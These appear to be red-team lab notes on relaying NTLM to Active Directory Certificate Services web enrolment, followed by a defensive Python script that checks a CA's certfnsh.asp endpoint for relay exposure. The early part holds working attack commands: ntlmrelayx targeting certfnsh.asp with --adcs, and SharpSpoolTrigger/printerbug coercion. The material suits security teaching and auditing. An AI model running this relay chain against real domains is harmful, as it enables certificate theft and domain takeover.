NTLM Relaying to ADCS endpoints

AD CS services support HTTP enrolment methods and even include a GUI.

This endpoint is usually found at http[s]://<server>/certsrv, for example:

https://dc-2.dev.cyberbotic.io/certsrv

Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation.

The ntlmrelayx command needs to target the certfnsh.asp page on the ADCS server:

sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

Then force the authentication to occur from WEB to WKSTN-2:

SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

(can also be done with printerbug.py)
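The relay above only works because certfnsh.asp answers the NTLM challenge without binding it to a TLS channel. The following audit script is an added example (not from the original page) that a defender can run against their own CA's web-enrolment endpoint to see which authentication schemes it offers; the hostnames and header values used in it are constructed.

```python
"""Audit an AD CS web-enrolment endpoint for NTLM-relay exposure.

Added example, not from the original page; sample challenges are constructed.
"""
from http.client import HTTPConnection, HTTPSConnection
from urllib.parse import urlsplit

CERTFNSH = "/certsrv/certfnsh.asp"  # page targeted by ntlmrelayx --adcs


def classify_challenge(scheme: str, www_authenticate: list[str]) -> dict:
    """Classify the 401 challenge returned by certfnsh.asp.

    scheme: "http" or "https"; www_authenticate: WWW-Authenticate header values.
    NTLM over plain HTTP is always relayable: without TLS, Extended Protection
    (EPA) cannot bind the NTLM exchange to a channel. Over HTTPS it is still
    relayable unless EPA is set to Required on the IIS application, which the
    challenge does not reveal, so that case is reported as "verify EPA".
    """
    schemes = {v.split()[0].lower() for v in www_authenticate if v.strip()}
    # "Negotiate" alone still permits NTLM fallback inside SPNEGO
    accepts_ntlm = "ntlm" in schemes or "negotiate" in schemes
    if not accepts_ntlm:
        verdict = "no NTLM/Negotiate offered; not relayable"
    elif scheme == "http":
        verdict = "NTLM offered over plain HTTP; relayable, disable the HTTP binding"
    else:
        verdict = "NTLM offered over HTTPS; relayable unless EPA is Required, verify IIS"
    return {"accepts_ntlm": accepts_ntlm, "plaintext": scheme == "http", "verdict": verdict}


def probe(url: str, timeout: float = 5.0) -> dict:
    """Send one unauthenticated GET to certfnsh.asp and classify the challenge."""
    parts = urlsplit(url)
    conn_cls = HTTPSConnection if parts.scheme == "https" else HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        conn.request("GET", CERTFNSH)
        resp = conn.getresponse()
        challenges = [v for k, v in resp.getheaders() if k.lower() == "www-authenticate"]
        return classify_challenge(parts.scheme, challenges) | {"status": resp.status}
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed challenges in the form IIS returns them for the certsrv application
    print(classify_challenge("http", ["Negotiate", "NTLM"]))
    print(classify_challenge("https", ["Negotiate", "NTLM"]))
    print(classify_challenge("https", ["Negotiate"]))
```

Run `probe("https://<ca-host>")` against your own CA to classify a live challenge; a "plain HTTP" verdict means the binding should be removed, and an HTTPS verdict still needs EPA confirmed in IIS Manager.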
